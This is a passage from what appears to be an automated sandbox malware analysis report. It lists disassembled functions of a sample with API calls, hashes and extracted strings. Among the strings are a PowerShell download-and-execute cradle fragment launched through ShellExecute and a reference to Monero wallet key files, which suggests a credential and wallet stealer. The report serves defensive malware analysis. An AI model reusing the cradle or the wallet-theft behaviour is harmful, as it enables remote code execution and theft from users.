                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                            • Instruction ID: 3d89e451b0134de5cba17644aebd4d6396d4cca1548951fe18068c7e3cbefaae
                            • Opcode Fuzzy Hash: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                            • Instruction Fuzzy Hash: D641BD71C106189ADF1AEBA0C892FEDBB78AF14300F404219E116AA191DF746A4ADFD6
                            Function 00389E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00389F41
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: bc78e0da8bdcfd688d55708eac6e874ddd8bd4f4e50420e2eaa3728b1a275d4a
                            • Instruction ID: 9ee28b8b92e5744d7de88d3264d86ab76f5a7fd1a6e6a7786fb44071c7f4bd18
                            • Opcode Fuzzy Hash: bc78e0da8bdcfd688d55708eac6e874ddd8bd4f4e50420e2eaa3728b1a275d4a
                            • Instruction Fuzzy Hash: 99612D71A10748DBDF15EFA4CC96BED7779AF45300F008118F90A5F591EB746A06CB92
                            Function 003940B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0115DA40,00000000,00020119,?), ref: 003940F4
                            • RegQueryValueExA.ADVAPI32(?,0115E418,00000000,00000000,00000000,000000FF), ref: 00394118
                            • RegCloseKey.ADVAPI32(?), ref: 00394122
                            • lstrcat.KERNEL32(?,00000000), ref: 00394147
                            • lstrcat.KERNEL32(?,0115E550), ref: 0039415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
                            • Instruction ID: d151493793ad9709ab334dca937bede1bb1ded965656a3f3972f70a333d3f370
                            • Opcode Fuzzy Hash: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
                            • Instruction Fuzzy Hash: 8B4187B6D0020C6BDF15FBA0EC46FFE777DAB98304F004558B6199A181EA755B8C8BD2
                            Function 00397E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0114C2D8,00000000,00020119,?), ref: 00397E5E
                            • RegQueryValueExA.ADVAPI32(?,0115DC80,00000000,00000000,000000FF,000000FF), ref: 00397E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00397E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                            • Instruction ID: 78733bb401f4613260b543a5ff669a32013de9ad7076e20188d879113f4ef110
                            • Opcode Fuzzy Hash: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                            • Instruction Fuzzy Hash: DF118CB1A44609EFDB04CB95DD4AFBBBBBCFB04B04F104119F605A7280D77458049BA1
                            Function 00399260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(0115E178,?,?,?,0039140C,?,0115E178,00000000), ref: 0039926C
                            • lstrcpyn.KERNEL32(005CAB88,0115E178,0115E178,?,0039140C,?,0115E178), ref: 00399290
                            • lstrlen.KERNEL32(?,?,0039140C,?,0115E178), ref: 003992A7
                            • wsprintfA.USER32 ref: 003992C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                            • Instruction ID: ad1e8d353323ad1ad146f47ad606d3f36ffbee88219628bbf869166dbc264012
                            • Opcode Fuzzy Hash: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                            • Instruction Fuzzy Hash: 86019E7550020CAFCB04DFE8C988EAE7BB9EB58358F148548F9099B204C635AA549B91
                            Function 003812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                            • RegCloseKey.ADVAPI32(?), ref: 003812FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                            • Instruction ID: 4ca217422f8899104f96c4f287e36d8c2bc56c00aba07c8c38476ef559920c89
                            • Opcode Fuzzy Hash: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                            • Instruction Fuzzy Hash: 24011DB9A4020CBFDB00DFE0DC49FAEBBB8EB48705F008159FA0597280D6709A059B91
                            Function 0039C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7b7341884404827fefde2bc9778f001e2f98673208f2b33b9ff481b007edd087
                            • Instruction ID: 916c93572e2d7d2c5c4c434819b838a97b06b298ac9cb1c8cdbdc1a611792908
                            • Opcode Fuzzy Hash: 7b7341884404827fefde2bc9778f001e2f98673208f2b33b9ff481b007edd087
                            • Instruction Fuzzy Hash: 2141F5B151079C5EDF228B248D95FFBBBECAB45704F1854E8E98A86182D3719A44CF60
                            Function 00396630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00396663
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00396726
                            • ExitProcess.KERNEL32 ref: 00396755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                            • Instruction ID: d910416e87135a02df21188dea274fd6c4520ac9f441bf93b399fba75cf1a555
                            • Opcode Fuzzy Hash: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                            • Instruction Fuzzy Hash: 98312CB1801618ABDF15EB90DC96FDEBB78AF54300F404189F2096A191DF746B49CFAA
                            Function 003987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E28,00000000,?), ref: 0039882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00398836
                            • wsprintfA.USER32 ref: 00398850
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                            • Instruction ID: 6132db35c8259e01b110a38edf589d10516b125139312c7cb7f82438d3c5d01b
                            • Opcode Fuzzy Hash: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                            • Instruction Fuzzy Hash: 17214CB1E40608AFDB04DFD8DD49FAEBBB8FB48B05F104119F605A7280C779A904DBA1
                            Function 00398D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0039951E,00000000), ref: 00398D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00398D62
                            • wsprintfW.USER32 ref: 00398D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                            • Instruction ID: d4ca25468d2c90a7e9750373d6ed5c2b3ea3f849062d1a79ee7a9a51fc39b50f
                            • Opcode Fuzzy Hash: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                            • Instruction Fuzzy Hash: A6E08CB0A4020CBFE700DB94DC0AE697BBCEB0470AF000094FD0997280DA719E04AB96
                            Function 0038A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0038A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0038A6BC
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0038A743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
